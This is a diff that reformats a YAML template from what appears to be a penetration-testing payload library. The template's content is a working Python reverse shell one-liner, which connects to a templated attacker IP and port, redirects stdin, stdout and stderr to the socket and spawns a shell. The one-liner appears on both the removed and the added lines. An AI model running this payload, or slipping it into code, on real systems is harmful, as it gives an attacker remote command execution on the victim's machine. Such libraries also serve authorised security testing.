--- a/src/profi/templates/payloads/revshell-linux-python2-hardcoded.yaml
+++ b/src/profi/templates/payloads/revshell-linux-python2-hardcoded.yaml
@@ -1,12 +1,9 @@
+---
 metadata:
-  filename: revshell-linux-python2-hardcoded.yaml
-  tags:
-  - shell
-  - linux
-  created: '2025-03-29'
-  author: Unknown
-content: 'python -c ''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{{
-  attacker_ip }}",{{ shell_port }}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import
-  pty; pty.spawn("sh")''
+  filename: "revshell-linux-python2-hardcoded.yaml"
+  tags: ["shell", "linux"]
+  created: "2025-03-29"
+  author: "Unknown"
 
-  '
+content: |
+  python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{{ attacker_ip }}",{{ shell_port }}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
